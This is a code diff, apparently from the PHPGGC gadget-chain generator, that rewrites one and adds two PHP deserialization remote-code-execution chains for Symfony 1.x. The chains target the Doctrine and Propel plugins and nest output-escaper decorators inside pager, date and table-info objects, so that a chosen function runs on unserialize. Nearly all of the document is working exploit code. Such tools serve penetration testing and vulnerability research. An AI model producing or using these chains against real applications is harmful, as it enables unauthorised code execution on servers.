Replacing initial chains with alternative chains for Symfony 1.x from 1.0.0 to 1.2.12

Author: darkpills

gadgetchains/Symfony/RCE/13/chain.php

@@ -4,41 +4,17 @@
 
 class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = '1.0.0 < 1.2.12';
-    public static $vector = '__destruct';
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = 'Serializable';
     public static $author = 'darkpills';
-
-
-    public function process_serialized($serialized)
-    {
-        $serialized2 = $serialized;
-        
-        // Leveraging PHP Bug #49649
-        // insert the same $output attribute of lime_test class, but with public visibility 
-        // for breaking change between 1.2.8 and 1.2.9 in lime_test attributes
-        $find = '#s:9:".\\*.output";(.*}}})s:10:".\\*.results";#';
-        $replace = 's:9:"'.chr(0).'*'.chr(0).'output";${1}s:6:"output";${1}s:10:"'.chr(0).'*'.chr(0).'results";';
-        $serialized2 = preg_replace($find, $replace, $serialized2);
-
-        // update the number of properties
-        $find = '#"lime_test":8#';
-        $replace = '"lime_test":9';
-        $serialized2 = preg_replace($find, $replace, $serialized2);
-        
-        return $serialized2;
-    }
+    public static $information = 'With sfDoctrinePlugin enabled';
 
     public function generate(array $parameters)
     {
-        $value = array($parameters['parameter']);
-        $escaper1 = new \sfOutputEscaperArrayDecorator($parameters['function'], $value);
-
-        $lime_colorizer = new \lime_colorizer();
-        $escaper2 = new \sfOutputEscaperObjectDecorator(array($escaper1, "current"), $lime_colorizer);
-        
-        $lime_output = new \lime_output_color($escaper2);
-        $lime_test = new \lime_test($lime_output);
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
 
-        return $lime_test;
+        $pager = new \sfDoctrinePager($escaper);
+    
+        return $pager;
     }
 }

gadgetchains/Symfony/RCE/13/gadgets.php

@@ -1,52 +1,24 @@
 <?php
 
-class lime_test
+class sfDoctrinePager implements Serializable
 {
+  protected
+    $prop                 = null;
 
-  protected $output  = null;
-  protected $results = array();
-  protected $options = array();
-
-  public $plan = null;
-  public $test_nb = 1;
-  public $failed = 1;
-  public $passed = 0;
-  public $skipped = 0;
-
-  function __construct($output)
-  {
-    $this->output = $output;
+  public function __construct($prop) {
+    $this->prop = $prop;
   }
-}
-
-class lime_output_color
-{
-  public $colorizer = null;
 
-  function __construct($colorizer)
+  public function serialize()
   {
-    $this->colorizer = $colorizer;
+    return serialize($this->prop);
   }
-}
-
-
-class sfOutputEscaperObjectDecorator
-{
-  protected $value;
 
-  protected $escapingMethod;
-
-  public function __construct($escapingMethod, $value) {
-    $this->escapingMethod = $escapingMethod;
-    $this->value = $value;
+  public function unserialize($serialized)
+  {
   }
 }
 
-class lime_colorizer
-{
-}
-
-
 class sfOutputEscaperArrayDecorator
 {
   protected $value;

gadgetchains/Symfony/RCE/14/chain.php

@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE14 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.2.0 <= 1.2.12';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperObjectDecorator($parameters['function'], new \sfCultureInfo($parameters['parameter']));
+        
+        $date = new \PropelDateTime(null, $escaper);
+
+        return $date;
+    }
+}

gadgetchains/Symfony/RCE/14/gadgets.php

@@ -0,0 +1,42 @@
+<?php
+class PropelDateTime extends DateTime
+{
+  private $dateString;
+
+	private $tzString;
+
+  public function __construct($dateString, $tzString) {
+    $this->dateString = $dateString;
+    $this->tzString = $tzString;
+  }
+}
+
+
+class sfOutputEscaperObjectDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class sfCultureInfo
+{
+  protected $dataFileExt = '.dat';
+  protected $data = array();
+  protected $culture;
+  protected $dataDir;
+  protected $dataFiles = array();
+  protected $dateTimeFormat;
+  protected $numberFormat;
+  protected $properties = array();
+
+  public function __construct($culture) {
+    $this->culture = $culture;
+  }
+
+}

gadgetchains/Symfony/RCE/15/chain.php

@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '1.0.0 <= 1.1.9';
+    public static $vector = '__wakeup';
+    public static $author = 'darkpills';
+    public static $information = 'With sfPropelPlugin enabled, which contains Creole ORM';
+
+    public function generate(array $parameters)
+    {
+        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));
+
+        $tableInfo = new \MySQLiTableInfo($escaper);
+    
+        return $tableInfo;
+    }
+}

gadgetchains/Symfony/RCE/15/gadgets.php

@@ -0,0 +1,38 @@
+<?php
+
+class sfOutputEscaperArrayDecorator
+{
+  protected $value;
+
+  protected $escapingMethod;
+
+  public function __construct($escapingMethod, $value) {
+    $this->escapingMethod = $escapingMethod;
+    $this->value = $value;
+  }
+}
+
+class MySQLiTableInfo 
+{
+
+  protected $name;
+  protected $columns = array();
+  protected $foreignKeys = array();
+  protected $indexes = array();
+  protected $primaryKey;
+  protected $pkLoaded = false;
+  protected $fksLoaded = false;
+  protected $indexesLoaded = false;
+  protected $colsLoaded = false;
+  protected $vendorLoaded = false;
+  protected $vendorSpecificInfo = array();
+  protected $conn;
+  protected $database;
+  protected $dblink;
+  protected $dbname;
+
+  public function __construct($columns)
+  {
+    $this->columns = $columns;
+  }
+}